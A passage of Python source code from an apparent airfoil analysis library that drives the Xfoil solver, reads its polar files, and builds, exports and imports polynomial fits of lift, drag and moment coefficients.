input_dict.get(\"steps\")\n index = input_dict.get(\"index\", None)\n log_step = input_dict.get(\"log_step\", False)\n\n # Check that the range will actually have multiple points\n if N == 1:\n raise IOError(\"A range with only one step may not be specified for a degree of freedom. Please give a single float instead.\")\n \n if log_step:\n return list(np.logspace(np.log10(lower), np.log10(upper), N)), index\n else:\n return list(np.linspace(lower, upper, N)), index\n\n\n def export_database(self, **kwargs):\n \"\"\"Exports the database generated by generate_database().\n\n Parameters\n ----------\n filename : str\n File to export the database to.\n \"\"\"\n\n filename = kwargs.get(\"filename\")\n\n # Check the database is there\n if hasattr(self, \"_data\"):\n\n # Create header\n header = []\n\n # Add degrees of freedom\n for dof in sorted(self._dof_db_cols.items(), key=operator.itemgetter(1)):\n header.append(\"{:<25s}\".format(dof[0]))\n\n # Add coefficients\n header.append(\"{:<25s}\".format('CL'))\n header.append(\"{:<25s}\".format('CD'))\n header.append(\"{:<25s}\".format('Cm'))\n header = \" \".join(header)\n\n # Export\n with open(filename, 'w') as db_file:\n np.savetxt(db_file, self._data, '%25.10E', header=header)\n else:\n raise RuntimeError(\"No database has been generated for airfoil {0}. Please create a database before exporting.\".format(self.name))\n\n\n def import_database(self, **kwargs):\n \"\"\"Imports the specified database. Please note that if you have generated your own database not\n using AirfoilDatabase, angle of attack should be stored in radians, rather than degrees.\n\n Parameters\n ----------\n filename : str\n File to import the database from\n\n update_type : bool, optional\n Whether to update the airfoil to use the newly imported database for calculations. Defaults to True.\n \"\"\"\n\n filename = kwargs.get(\"filename\")\n\n # Load data from file\n with open(filename, 'r') as db_file:\n self._data = np.loadtxt(db_file)\n\n # Determine the column indices\n with open(filename, 'r') as db_file:\n header = db_file.readline().strip('#')\n self._dof_db_cols = {}\n self._num_dofs = 0\n for i, col_name in enumerate(header.split()):\n\n # Stop once we get to coefficient columns\n if col_name == \"CL\":\n break\n\n # Add\n self._dof_db_cols[col_name] = i\n self._num_dofs += 1\n\n # Figure out the order of the columns in the database\n dof_sorted = sorted(self._dof_db_cols.items(), key=operator.itemgetter(1))\n self._dof_db_order = [x[0] for x in dof_sorted]\n\n # Update type\n if kwargs.get(\"update_type\", True):\n self.set_type(\"database\")\n\n\n def run_xfoil(self, **kwargs):\n \"\"\"Calls Xfoil and extracts the aerodynamic coefficients at the given state.\n\n Parameters\n ----------\n alpha : float or list of float\n Angle(s) of attack to calculate the coefficients at in radians. Defaults to 0.0.\n\n Rey : float or list of float\n Reynolds number(s) to calculate the coefficients at. Defaults to 1000000.\n\n Mach : float or list of float\n Mach number(s) to calculate the coefficients at. Defaults to 0.0.\n\n trailing_flap_deflection : float or list of float\n Flap deflection(s) to calculate the coefficients at in radians. Defaults to 0.0.\n\n trailing_flap_fraction : float or list of float\n Flap fraction(s) to calculate the coefficients at in radians. Defaults to 0.0.\n\n N : int, optional\n Number of panels for Xfoil to use. Defaults to 200.\n\n max_iter : int, optional\n Maximum iterations for Xfoil. Defaults to 100.\n\n visc : bool, optional\n Whether to include viscosity. Defaults to True.\n\n x_trip : float or list, optional\n x location, non-dimensionalized by the chord length, of the boundary layer trip position. This is \n specified for the top and bottom of the airfoil. If a float, the value is the same for the top\n and the bottom. If a list, the first list element is the top trip location and the second list element\n is the bottom trip location. Defaults to 1.0 for both.\n\n xycm : list, optional\n x-y coordinates, non-dimensionalized by the chord length, of the reference point for determining the\n moment coefficient. Defaults to the quater-chord.\n\n N_crit : float, optional\n Critical amplification exponent for the boundary layer in Xfoil. Defaults to 9.0.\n\n show_xfoil_output : bool, optional\n Display whatever Xfoil outputs from the command line interface. Defaults to False.\n\n show_xfoil_plots : bool, optional\n Display Xfoil plots. Defaults to True.\n \n resize_xfoil_window : float, optional\n resizes the xfoil window to screen size fraction. Xfoil defaults to 0.8 window/screen size.\n This variable defaults to None. Has no effect if show_xfoil_plots is False.\n\n CD_type : str, optional\n Which drag coefficient to read in. May be 'total', 'friction', or 'pressure'.\n Defaults to 'total'.\n\n verbose : bool, optional\n\n Returns\n -------\n CL : ndarray\n Coefficient of lift. First dimension will match the length of alpha, second will match Rey, etc.\n\n CD : ndarray\n Coefficient of drag. Dimensions same as CL.\n\n Cm : ndarray\n Moment coefficient. Dimensions same as CL.\n \"\"\"\n N = kwargs.get(\"N\", 200)\n max_iter = kwargs.get(\"max_iter\", 100)\n verbose = kwargs.get(\"verbose\", True)\n show_xfoil_output = kwargs.get(\"show_xfoil_output\", False)\n x_trip = kwargs.get(\"x_trip\", [1.0, 1.0])\n xycm = kwargs.get(\"xycm\", [0.25, 0.0])\n if isinstance(x_trip, float):\n x_trip = [x_trip, x_trip]\n N_crit = kwargs.get(\"N_crit\", 9.0)\n\n # Get states\n # Angle of attack\n alphas = kwargs.get(\"alpha\", [0.0])\n if isinstance(alphas, float):\n alphas = [alphas]\n first_dim = len(alphas)\n \n # Reynolds number\n Reys = kwargs.get(\"Rey\", [1000000.0])\n if isinstance(Reys, float):\n Reys = [Reys]\n second_dim = len(Reys)\n\n # Mach number\n Machs = kwargs.get(\"Mach\", [0.0])\n if isinstance(Machs, float):\n Machs = [Machs]\n third_dim = len(Machs)\n\n # Flap deflections\n delta_fts = kwargs.get(\"trailing_flap_deflection\", [0.0])\n if isinstance(delta_fts, float):\n delta_fts = [delta_fts]\n fourth_dim = len(delta_fts)\n\n # Flap fractions\n c_fts = kwargs.get(\"trailing_flap_fraction\", [0.0])\n if isinstance(c_fts, float):\n c_fts = [c_fts]\n fifth_dim = len(c_fts)\n\n # xfoil window resizing\n resize_xfoil_window = kwargs.get('resize_xfoil_window', None)\n\n # Initialize coefficient arrays\n CL = np.empty((first_dim, second_dim, third_dim, fourth_dim, fifth_dim))\n CD = np.empty((first_dim, second_dim, third_dim, fourth_dim, fifth_dim))\n Cm = np.empty((first_dim, second_dim, third_dim, fourth_dim, fifth_dim))\n CL[:] = np.nan\n CD[:] = np.nan\n Cm[:] = np.nan\n\n # Clean up from previous iterations\n dir_list = os.listdir()\n for item in dir_list:\n if os.path.isfile(item) and \".pacc\" in item or \".geom\" in item:\n os.remove(item)\n\n # Loop through flap deflections and fractions\n if verbose:\n print(\"Running Xfoil...\")\n print(\"{0:>25}{1:>25}{2:>25}\".format(\"Percent Complete\", \"Flap Deflection [deg]\", \"Flap Fraction\"))\n print(''.join(['-']*75))\n num_xfoil_runs = fourth_dim*fifth_dim\n for l, delta_ft in enumerate(delta_fts):\n for m, c_ft in enumerate(c_fts):\n \n # Clear pacc file list\n pacc_files = []\n file_id = 0\n \n # Export geometry\n outline_points = \"a_{0:1.6f}_{1:1.6f}.geom\".format(delta_ft, c_ft)\n #outline_points = os.path.abspath(\"xfoil_geom_{0:1.6f}.geom\".format(delta_ft))\n self.get_outline_points(N=N, trailing_flap_deflection=delta_ft, trailing_flap_fraction=c_ft, export=outline_points, close_te=False)\n\n # Display update\n if verbose:\n percent_complete = round((l*fifth_dim+m)/(num_xfoil_runs)*100)\n print(\"{0:>24}%{1:>25}{2:>25}\".format(percent_complete, math.degrees(delta_ft), c_ft))\n\n # Loop through Reynolds number\n for Re in Reys:\n\n # Initialize xfoil execution\n with sp.Popen(['xfoil'], stdin=sp.PIPE, stdout=sp.PIPE) as xfoil_process:\n\n commands = []\n\n # Turn off plots\n if not kwargs.get(\"show_xfoil_plots\", True):\n commands += ['PLOP',\n 'G',\n '']\n elif resize_xfoil_window != None:\n commands += ['PLOP',\n 'W {}'.format(resize_xfoil_window),\n '']\n\n # Read in geometry\n commands += ['LOAD {0}'.format(outline_points),\n '{0}'.format(self.name)]\n\n # Set panelling ratio and let Xfoil make its own panels\n # This throws a fortran error if the plots are turned off with Xfoil 6.99\n commands += ['PPAR',\n 'N',\n '{0}'.format(N),\n 'T',\n '1',\n '',\n '']\n\n # Set moment reference point\n commands += ['XYCM',\n str(xycm[0]),\n str(xycm[1])]\n\n # Set viscous mode (if desired)\n if kwargs.get(\"visc\", True):\n commands += ['OPER',\n 'VISC',\n '']\n\n # Set boundary layer parameters\n commands += ['VPAR',\n 'Xtr',\n str(x_trip[0]),\n str(x_trip[1]),\n 'N',\n str(N_crit),\n '',\n '']\n\n # Initialize PACC index\n pacc_index = 0\n\n # Loop through Mach numbers\n for M in Machs:\n\n # Polar accumulation file\n file_id += 1\n pacc_file = \"xfoil_results_{0}.pacc\".format(file_id)\n pacc_files.append(pacc_file)\n\n # Set Mach, Reynolds number, iteration limit, and polar accumulation\n if kwargs.get(\"visc\", True):\n commands += ['OPER',\n 'RE',\n str(Re),\n 'MACH',\n str(M),\n 'ITER {0}'.format(max_iter),\n 'PACC',\n pacc_file,\n '']\n else:\n commands += ['OPER',\n 'MACH',\n str(M),\n 'ITER {0}'.format(max_iter),\n 'PACC',\n pacc_file,\n '']\n\n # Sweep angle of attack\n if len(alphas) == 1:\n commands.append('ALFA {0:1.6f}'.format(math.degrees(alphas[0])))\n\n else:\n # Sweep from 0 aoa up\n zero_ind = np.argmin(np.abs(alphas))\n if zero_ind != len(alphas)-1:\n for a in alphas[zero_ind:]:\n commands.append('ALFA {0:1.6f}'.format(math.degrees(a)))\n \n # Reset solver\n commands.append('INIT')\n\n # Sweep from 0 aoa down\n if zero_ind != 0:\n for a in alphas[zero_ind-1::-1]:\n commands.append('ALFA {0:1.6f}'.format(math.degrees(a)))\n \n # Reset solver\n commands.append('INIT')\n\n # End polar accumulation\n commands += ['PACC {0}'.format(pacc_index),\n '']\n pacc_index += 1\n\n # Finish commands\n commands += ['',\n 'QUIT']\n\n # Run Xfoil\n xfoil_input = '\\r'.join(commands).encode('utf-8')\n response = xfoil_process.communicate(xfoil_input)\n\n # Show output\n if show_xfoil_output:\n print(response[0].decode('utf-8'))\n if response[1] is not None:\n print(response[1].decode('utf-8'))\n\n # Clean up geometry\n os.remove(outline_points)\n\n # Read in files and store arrays\n for filename in pacc_files:\n\n # Read in file\n try:\n alpha_i, CL_i, CD_i, Cm_i, Re_i, M_i = self.read_pacc_file(filename, CD_type=kwargs.get('CD_type', 'total'))\n except FileNotFoundError:\n warnings.warn(\"Couldn't find results file {0}. Usually an indication of Xfoil crashing.\".format(filename))\n continue\n\n # Determine the Reynolds and Mach indices\n j = min(range(len(Reys)), key=lambda i: abs(Reys[i]-Re_i))\n\n k = min(range(len(Machs)), key=lambda i: abs(Machs[i]-M_i))\n\n # Loop through alphas\n i_true = 0\n for i_iter, alpha in enumerate(alpha_i):\n\n # Line up with our original independent alpha, as Xfoil does not output a non-converged result\n i_true = min(range(len(alphas)), key=lambda i: abs(alphas[i]-alpha))\n\n CL[i_true,j,k,l,m] = CL_i[i_iter]\n CD[i_true,j,k,l,m] = CD_i[i_iter]\n Cm[i_true,j,k,l,m] = Cm_i[i_iter]\n\n # Interpolate missing values\n for i, alpha in enumerate(alpha_i):\n if np.isnan(CL[i,j,k,l,m]): # Result did not converge\n\n # Mid-value\n if i != 0 and i != len(alpha_i)-1:\n weight = (alpha_i[i+1]-alpha)/(alpha_i[i+1]-alpha_i[i-1])\n CL[i,j,k,l,m] = CL[i-1,j,k,l,m]*(1-weight)+CL[i+1,j,k,l,m]*weight\n CD[i,j,k,l,m] = CD[i-1,j,k,l,m]*(1-weight)+CD[i+1,j,k,l,m]*weight\n Cm[i,j,k,l,m] = Cm[i-1,j,k,l,m]*(1-weight)+Cm[i+1,j,k,l,m]*weight\n\n # Clean up polar files\n os.remove(filename)\n\n return CL, CD, Cm\n\n\n def read_pacc_file(self, filename, CD_type='total'):\n \"\"\"Reads in and formats an Xfoil polar accumulation file.\n\n Parameters\n ----------\n filename : str\n File to read in.\n\n CD_type : str, optional\n Which drag coefficient to read in. May be 'total', 'friction', or 'pressure'.\n Defaults to 'total'.\n\n Returns\n -------\n alpha : list\n List of angles of attack from the accumulation polar.\n\n CL : list\n Coefficient of lift at each alpha.\n\n CD : list\n Coefficient of drag at each alpha.\n \n Cm : list\n Moment coefficient at each alpha.\n\n Re : float\n Reynolds number for the polar.\n\n M : float\n Mach number for the polar.\n \"\"\"\n\n # Open file\n with open(filename, 'r') as file_handle:\n\n # Read in line by line\n lines = []\n line = file_handle.readline()\n while line:\n lines.append(line)\n line = file_handle.readline()\n\n # Find Mach and Reynolds number\n mr_line = lines[8].split()\n M = float(mr_line[2])\n Re = float(''.join(mr_line[5:8]))\n\n # Collect alpha and coefficients\n alpha = []\n CL = []\n CD = []\n Cm = []\n for line in lines[12:]:\n split_line = line.split()\n alpha.append(math.radians(float(split_line[0])))\n CL.append(float(split_line[1]))\n if CD_type=='total':\n CD.append(float(split_line[2]))\n elif CD_type=='pressure':\n CD.append(float(split_line[3]))\n elif CD_type=='friction':\n CD.append(float(split_line[2])-float(split_line[3]))\n Cm.append(float(split_line[4]))\n\n # Sort in alpha\n sorted_indices = np.argsort(alpha)\n alpha = np.array(alpha)[sorted_indices]\n CL = np.array(CL)[sorted_indices]\n CD = np.array(CD)[sorted_indices]\n Cm = np.array(Cm)[sorted_indices]\n\n return alpha, CL, CD, Cm, Re, M\n\n\n def _create_filled_database(self):\n # Fills in missing values in the database to make it a consistent d-dimensional array.\n\n # Initialize storage for independent vars\n self._dof_filled = []\n for i in range(self._num_dofs):\n self._dof_filled.append([])\n\n # Gather independent vars\n for i in range(self._data.shape[0]):\n for j in range(self._num_dofs):\n\n # Check if the value is already there\n if not self._data[i,j] in self._dof_filled[j]:\n self._dof_filled[j].append(self._data[i,j])\n\n # Sort independent vars and initialize filled array\n shape = []\n for dof in self._dof_filled:\n dof.sort()\n shape.append(len(dof))\n filled_CL = np.zeros(tuple(shape))\n filled_CD = np.zeros(tuple(shape))\n filled_Cm = np.zeros(tuple(shape))\n N = filled_CL.size\n\n # Create grid of independent vars\n raw_grid = np.meshgrid(*self._dof_filled)\n\n # Parse independent vars for passing to getters\n params = {}\n for i, dof in enumerate(self._dof_db_order):\n params[dof] = raw_grid[i].flatten()\n\n # Fill in values\n filled_CL_view = filled_CL.reshape(N)\n filled_CL_view[:] = self.get_CL(**params)\n filled_CD_view = filled_CD.reshape(N)\n filled_CD_view[:] = self.get_CD(**params)\n filled_Cm_view = filled_Cm.reshape(N)\n filled_Cm_view[:] = self.get_Cm(**params)\n\n # Huh. Turns out I don't actually need this, so I'm not going to bother developing it further. But I'll keep it here in case it becomes useful\n\n\n def generate_polynomial_fit(self, **kwargs):\n \"\"\"Generates a set of multivariable polynomials using least-squares regression to approximate the database.\n Note: This airfoil must have a database already for fits to be created.\n\n Parameters\n ----------\n CL_degrees : dict or str, optional\n If dict, order of fit polynomial for the coefficient of lift for each degree of freedom,\n formatted as\n\n {\n \"\" : ,\n \"\" : ,\n ...\n }\n\n Orders must be integers. Defaults to 1 for any not specified.\n\n Can also be specified as \"auto\". In this case, the fit degrees will be determined automatically\n using the method described in Morelli, \"Global Nonlinear Aerodynamic Modeling Using\n Multivariate Orthogonal Functions,\" Journal of Aircraft, 1995. The algorithm tried to minimize\n the RMS error between the data and the prediction while also minimizing the degree of the fit. \n This will automatically determine the fit order for each degree of freedom.\n\n CD_degrees : dict, optional\n Same as CL_degrees.\n\n Cm_degrees : dict, optional\n Same as CL_degrees.\n\n CL_kwargs : dict, optional\n keyword arguments sent to the CL polynomial fit function\n \n When CL_degrees is specified as \"auto\" then CL_kwargs can be\n \n \"max_order\" : int, optional\n gives the max order of polynomial for any one of the independent varialbes\n to try. Defaults to 6.\n \"tol\" : float, optional\n Gives the cut-off value for any polynomial coefficient to not be included\n in the final results. If a coefficient has an absolute value below tol,\n it won't be included. Defaults to 1e-12.\n \"sigma\" : float, optional\n value used to determine the trade off between how good of a fit to perform\n and how many terms to keep. Defaults to None, which causes the function to\n calculate sigma automatically using the mean squared of the difference of\n the independent variable values with respect to the mean independent\n variable value of the dataset\n \"sigma_multiplier\" : float, optional\n term multiplied onto sigma to change it's value. Allows using a multiple\n of the automatically determined sigma value. Defaults to 1.\n \n Otherwise CL_kwargs could be\n \n \"interaction\" : boolean, optional\n value with default set to True. This variable determines whether or not\n interaction terms are included in the fit function. If set to True,\n interaction terms up the max order for each independent variable are\n included, i.e. if Nvec = [3,2] then the highest interaction term included\n is x_1^3*x_2^2. Specific interaction terms can be omitted using the\n constraints input\n \"sym\" : list, optional\n Defaults to an empty list. If used, the length should be V and each element\n should contain a boolean, True or False. The ith element determines if the\n ith independent variable is symmetric either even or odd, which is\n determined by the order given in Nvec. This will also remove the\n cooresponding interaction terms if they are enabled.\n \"sym_same\" : list, optional\n Defaults as an empty list. If used, the entries in the list should be\n tuples with two integers. The integers represent the independent variables\n that the \"same\" symmetry condition will be applied. The \"same\" symmetry\n ensures all interaction terms with exponents of the two independent\n variables that are either odd-odd or even-even to be forced to zero\n \"sym_diff\" : = list, optional\n Defaults as an empty list. Similar to \"sym_same\" except it enforces the\n \"diff\" symmetry condition which ensures all interaction terms with exponents\n of the two independent variables that are either odd-even or even-odd to be\n forced to zero\n \"zeroConstraints\" : list, optional\n Defaults as an empty list. Entries in the list contain integer tuples of\n length V. The integer values represent the powers of the independent variables\n whose coefficient will be forced to 0 before the best fit calculations are\n performed, allowing the user to omit specific interaction terms or regular\n polynomial terms\n \"constraints\" : list, optional\n Defaults to an empty list. Entries in the list contain tuples of length 2.\n The first entry is a list of integers that represent the powers of the\n independent variables whose coefficient will then be forced to be equal to the\n second entry in the tuple, which should be a float.\n \"percent\" : boolean, optional\n Default set to False. When set to True the least squares is performed on the\n percent error squared. This option should not be used if y contains any zero\n or near zero values, as this might cause a divide by zero error.\n \"weighting\" : function, optional\n Defaults to None. If given, weighting should be a function that takes as\n arguments x, y, and p where x and y are the independent and dependent\n variables defined above and p is the index representing a certain data point.\n weighting should return a 'weighting factor' that determines how important\n that datapoint is. Returning a '1' weights the datapoint normally.\n \n CD_kwargs : dict, optional\n Same as CL_kwargs\n\n Cm_kwargs : dict, optional\n Same as CL_kwargs\n\n update_type : bool, optional\n Whether to update the airfoil to use the newly computed polynomial fits for calculations. Defaults to True.\n\n verbose : bool, optional\n \"\"\"\n\n # Check for database\n if not hasattr(self, \"_data\"):\n raise RuntimeError(\"No database found! Please generate or import a database before trying to create polynomial fits.\")\n\n # Determine what the maximum fit order is for autoPolyFit\n CL_degrees = kwargs.pop(\"CL_degrees\", {})\n CD_degrees = kwargs.pop(\"CD_degrees\", {})\n Cm_degrees = kwargs.pop(\"Cm_degrees\", {})\n CL_kwargs = kwargs.pop(\"CL_kwargs\", {})\n CD_kwargs = kwargs.pop(\"CD_kwargs\", {})\n Cm_kwargs = kwargs.pop(\"Cm_kwargs\", {})\n verbose = kwargs.pop('verbose', True)\n if verbose: print('Generating Polynomial Fits for airfoil {}'.format(self.name))\n CL_kwargs['verbose'] = verbose\n CD_kwargs['verbose'] = verbose\n Cm_kwargs['verbose'] = verbose\n\n # CL\n if verbose: print('Performing CL curve fit')\n if CL_degrees==\"auto\":\n self._CL_poly_coefs, self._CL_degrees, self._CLfit_R2 = autoPolyFit(self._data[:,:self._num_dofs], self._data[:, self._num_dofs], **CL_kwargs)\n\n elif isinstance(CL_degrees, dict):\n\n # Sort fit degrees\n self._CL_degrees = []\n for dof in self._dof_db_order:\n self._CL_degrees.append(CL_degrees.get(dof, 1))\n\n # Generate\n self._CL_poly_coefs, self._CLfit_R2 = multivariablePolynomialFit(self._CL_degrees, self._data[:,:self._num_dofs], self._data[:, self._num_dofs], **CL_kwargs)\n\n else:\n raise IOError(\"Fit degree specification must be 'auto' or type(dict). Got {0} type {1}.\".format(CL_degrees, type(CL_degrees)))\n \n # CD\n if verbose: print('Performing CD curve fit')\n if CD_degrees==\"auto\":\n self._CD_poly_coefs, self._CD_degrees, self._CDfit_R2 = autoPolyFit(self._data[:,:self._num_dofs], self._data[:,self._num_dofs+1], **CD_kwargs)\n\n elif isinstance(CL_degrees, dict):\n\n # Sort fit degrees\n self._CD_degrees = []\n for dof in self._dof_db_order:\n self._CD_degrees.append(CD_degrees.get(dof, 1))\n\n # Generate\n self._CD_poly_coefs, self._CDfit_R2 = multivariablePolynomialFit(self._CD_degrees, self._data[:,:self._num_dofs], self._data[:,self._num_dofs+1], **CD_kwargs)\n\n else:\n raise IOError(\"Fit degree specification must be 'auto' or type(dict). Got {0} type {1}.\".format(CL_degrees, type(CL_degrees)))\n \n # Cm\n if verbose: print('Performing Cm curve fit')\n if Cm_degrees==\"auto\":\n self._Cm_poly_coefs, self._Cm_degrees, self._Cmfit_R2 = autoPolyFit(self._data[:,:self._num_dofs], self._data[:,self._num_dofs+2], **Cm_kwargs)\n\n elif isinstance(Cm_degrees, dict):\n\n # Sort fit degrees\n self._Cm_degrees = []\n for dof in self._dof_db_order:\n self._Cm_degrees.append(Cm_degrees.get(dof, 1))\n\n # Generate polynomial fit\n self._Cm_poly_coefs, self._Cmfit_R2 = multivariablePolynomialFit(self._Cm_degrees, self._data[:,:self._num_dofs], self._data[:, self._num_dofs+2], **Cm_kwargs)\n\n # Store limits\n self._dof_limits = []\n for i in range(self._num_dofs):\n self._dof_limits.append([np.min(self._data[:,i]), np.max(self._data[:,i])])\n\n # Update type\n if kwargs.get(\"update_type\", True):\n self.set_type(\"poly_fit\")\n \n self._CLfit_RMS, self._CLfit_RMSN = multivariableRMS(self._data[:,:self._num_dofs], self._data[:,self._num_dofs], self._CL_poly_coefs, self._CL_degrees, verbose=verbose)\n self._CDfit_RMS, self._CDfit_RMSN = multivariableRMS(self._data[:,:self._num_dofs], self._data[:,self._num_dofs+1], self._CD_poly_coefs, self._CD_degrees, verbose=verbose)\n self._Cmfit_RMS, self._Cmfit_RMSN = multivariableRMS(self._data[:,:self._num_dofs], self._data[:,self._num_dofs+2], self._Cm_poly_coefs, self._Cm_degrees, verbose=verbose)\n \n if verbose:\n print('\\nCL fits\\n'+'='*20)\n print('R^2 : {}'.format(self._CLfit_R2))\n print('RMS : {}'.format(self._CLfit_RMS))\n print('RMSN: {}\\n'.format(self._CLfit_RMSN))\n print('CD fits\\n'+'='*20)\n print('R^2 : {}'.format(self._CDfit_R2))\n print('RMS : {}'.format(self._CDfit_RMS))\n print('RMSN: {}\\n'.format(self._CDfit_RMSN))\n print('Cm fits\\n'+'='*20)\n print('R^2 : {}'.format(self._Cmfit_R2))\n print('RMS : {}'.format(self._Cmfit_RMS))\n print('RMSN: {}\\n'.format(self._Cmfit_RMSN))\n\n\n def export_polynomial_fits(self, **kwargs):\n \"\"\"Save the polynomial fit to a JSON object.\n\n Parameters\n ----------\n filename : str\n JSON object to write polynomial fit data to.\n\n write_limits : bool, optional\n Whether to limit the polynomial fits based on the original range of data.\n Defaults to True.\n\n \"\"\"\n\n # Get filename\n filename = kwargs.get(\"filename\")\n\n # Create export dictionary\n export = {}\n export[\"tag\"] = \"Polynomial fit to database for {0} airfoil.\".format(self.name)\n export[\"degrees_of_freedom\"] = self._dof_db_order\n if kwargs.get(\"write_limits\"):\n export[\"limits\"] = self._dof_limits\n export[\"defaults\"] = self._dof_defaults\n export[\"fit_degrees\"] = {}\n export[\"fit_degrees\"][\"CL\"] = self._CL_degrees\n export[\"fit_degrees\"][\"CD\"] = self._CD_degrees\n export[\"fit_degrees\"][\"Cm\"] = self._Cm_degrees\n export['fit_error'] = {}\n export['fit_error']['CL'] = {}\n export['fit_error']['CL']['R^2'] = self._CLfit_R2\n export['fit_error']['CL']['RMS'] = self._CLfit_RMS\n export['fit_error']['CL']['RMSN'] = self._CLfit_RMSN\n export['fit_error']['CD'] = {}\n export['fit_error']['CD']['R^2'] = self._CDfit_R2\n export['fit_error']['CD']['RMS'] = self._CDfit_RMS\n export['fit_error']['CD']['RMSN'] = self._CDfit_RMSN\n export['fit_error']['Cm'] = {}\n export['fit_error']['Cm']['R^2'] = self._Cmfit_R2\n export['fit_error']['Cm']['RMS'] = self._Cmfit_RMS\n export['fit_error']['Cm']['RMSN'] = self._Cmfit_RMSN\n export[\"fit_coefs\"] = {}\n export[\"fit_coefs\"][\"CL\"] = list(self._CL_poly_coefs)\n export[\"fit_coefs\"][\"CD\"] = list(self._CD_poly_coefs)\n export[\"fit_coefs\"][\"Cm\"] = list(self._Cm_poly_coefs)\n\n # Export data\n with open(filename, 'w') as export_file_handle:\n json.dump(export, export_file_handle, indent=4)\n\n\n def import_polynomial_fits(self, **kwargs):\n \"\"\"Read in polynomial fit data from a JSON object.\n\n Parameters\n ----------\n filename : str\n JSON object to read polynomial fit data from.\n\n update_type : bool, optional\n Whether to update the airfoil to use the newly imported polynomial fits for calculations. Defaults to True.\n\n \"\"\"\n\n # Get filename\n filename = kwargs.get(\"filename\")\n\n # Read in data\n with open(filename, 'r') as import_file_handle:\n input_dict = json.load(import_file_handle)\n\n # Parse input dict\n self._dof_db_order = input_dict[\"degrees_of_freedom\"]\n self._num_dofs = len(self._dof_db_order)\n self._dof_limits = input_dict.get(\"limits\", [[-np.inf, np.inf]]*self._num_dofs)\n self._CL_degrees = input_dict[\"fit_degrees\"][\"CL\"]\n self._CD_degrees = input_dict[\"fit_degrees\"][\"CD\"]\n self._Cm_degrees = input_dict[\"fit_degrees\"][\"Cm\"]\n self._CL_poly_coefs = np.array(input_dict[\"fit_coefs\"][\"CL\"])\n self._CD_poly_coefs = np.array(input_dict[\"fit_coefs\"][\"CD\"])\n self._Cm_poly_coefs = np.array(input_dict[\"fit_coefs\"][\"Cm\"])\n if isinstance(input_dict.get('fit_error', None), dict):\n if isinstance(input_dict['fit_error'].get('CL', None), dict):\n self._CLfit_R2 = input_dict['fit_error']['CL'].get('R^2', None)\n self._CLfit_RMS = input_dict['fit_error']['CL'].get('RMS', None)\n self._CLfit_RMSN = input_dict['fit_error']['CL'].get('RMSN', None)\n if isinstance(input_dict['fit_error'].get('CD', None), dict):\n self._CDfit_R2 = input_dict['fit_error']['CD'].get('R^2', None)\n self._CDfit_RMS = input_dict['fit_error']['CD'].get('RMS', None)\n self._CDfit_RMSN = input_dict['fit_error']['CD'].get('RMSN', None)\n if isinstance(input_dict['fit_error'].get('Cm', None), dict):\n self._Cmfit_R2 = input_dict['fit_error']['Cm'].get('R^2', None)\n self._Cmfit_RMS = input_dict['fit_error']['Cm'].get('RMS', None)\n self._Cmfit_RMSN = input_dict['fit_error']['Cm'].get('RMSN', None)\n\n # Update type\n if kwargs.get(\"update_type\", True):\n self.set_type(\"poly_fit\")\n\n\n def _get_polynomial_data(self, coef_index, **kwargs):\n # Determines the value of the given coefficient from the polynomial fit\n # coef_index | coef\n # 0 | CL\n # 1 | CD\n # 2 | Cm\n\n # Stack up independent vars\n ind_vars = []\n N = 1\n for dof in self._dof_db_order:\n\n # Get independent variable values\n ind_var = kwargs.get(dof, self._dof_defaults[dof])\n \n # Check for array of size 1\n if not np.isscalar(ind_var) and len(ind_var) == 1:\n ind_vars.append(np.asscalar(ind_var))\n else:\n ind_vars.append(ind_var)\n\n # Update max size\n if not np.isscalar(ind_var):\n N = max(N, len(ind_var))\n\n # Fill any values\n if N > 1:\n for i, ind_var in enumerate(ind_vars):\n if np.isscalar(ind_var):\n ind_vars[i] = np.full(N, ind_var)\n\n # Setup input matrix\n if N == 1:\n x = np.array(ind_vars)[:,np.newaxis]\n else:\n x = np.array(ind_vars)\n\n # Get data\n if coef_index == 0:\n coef = multivariablePolynomialFunction(self._CL_poly_coefs, self._CL_degrees, x)\n elif coef_index == 1:\n coef = multivariablePolynomialFunction(self._CD_poly_coefs, self._CD_degrees, x)\n elif coef_index == 2:\n coef = multivariablePolynomialFunction(self._Cm_poly_coefs, self._Cm_degrees, x)\n\n # Check limits\n if self._raise_poly_bounds_error:\n for i in range(N):\n for j in range(self._num_dofs):\n if x[j,i] > self._dof_limits[j][1] or x[j,i] < self._dof_limits[j][0]:\n coef[i] = np.nan\n\n # Check for going out of bounds\n if np.isnan(coef).any():\n raise PolyFitBoundsError(self.name, np.argwhere(np.isnan(coef)).flatten(), kwargs)\n\n return coef\n\n\n def generate_linear_model(self, **kwargs):\n \"\"\"Creates a linearized model of the airfoil coefficients in alpha. Pulls from the\n database or poly_fit information to generate this model. Cannot be used on a type\n \"linear\" airfoil.\n \n linear_limits : list, optional\n Limits in alpha for which the behavior of the airfoil can be considered linear. If not\n given, the user will be prompted to graphically select this region. Given in degrees.\n\n update_type : bool, optional\n Whether to change the type of the airfoil to \"linear\" once the model is determined.\n Defaults to True.\n\n plot_model : bool, optional\n Whether to display a polar of the linear region determined. Defaults to False.\n\n Rey : float, optional\n Reynolds number at which to evaluate the model.\n\n Mach : float, optional\n Mach number at which to evaluate the model.\n \"\"\"\n\n # Check for correct type\n if self._type == \"linear\":\n raise RuntimeError(\"generate_linear_model() cannot be called on a 'linear' type airfoil.\")\n\n # Determine range of alpha\n linear_limits = kwargs.get(\"linear_limits\", None)\n if linear_limits is None:\n alpha = np.linspace(-20.0, 20.0, 30)\n else:\n alpha = np.linspace(linear_limits[0], linear_limits[1], 30)\n\n # Generate dataset\n CL = np.zeros(30)\n Cm = np.zeros(30)\n CD = np.zeros(30)\n for i, a in enumerate(alpha):\n try:\n CL[i] = self.get_CL(alpha=np.radians(a), **kwargs)\n Cm[i] = self.get_Cm(alpha=np.radians(a), **kwargs)\n CD[i] = self.get_CD(alpha=np.radians(a), **kwargs)\n except DatabaseBoundsError:\n continue\n\n # Plot dataset for user to select linear region\n if linear_limits is None:\n\n # Define picker\n self._selected_ind = []\n def on_pick(event):\n\n # Get index\n i = int(event.ind[0])\n self._selected_ind.append(i)\n\n # Add x\n fig.axes[0].plot(alpha[i], CL[i], 'rx')\n\n # Check if we have enough\n if len(self._selected_ind) >= 2:\n plt.close(fig)\n\n # Display\n plt.ion()\n fig, ax = plt.subplots()\n ax.plot(alpha, CL, 'bo', picker=3)\n plt.xlabel(\"Alpha [deg]\")\n plt.ylabel(\"Lift Coefficient\")\n plt.title(\"To generate a linear model, select the lower and upper limits of the linear region.\")\n 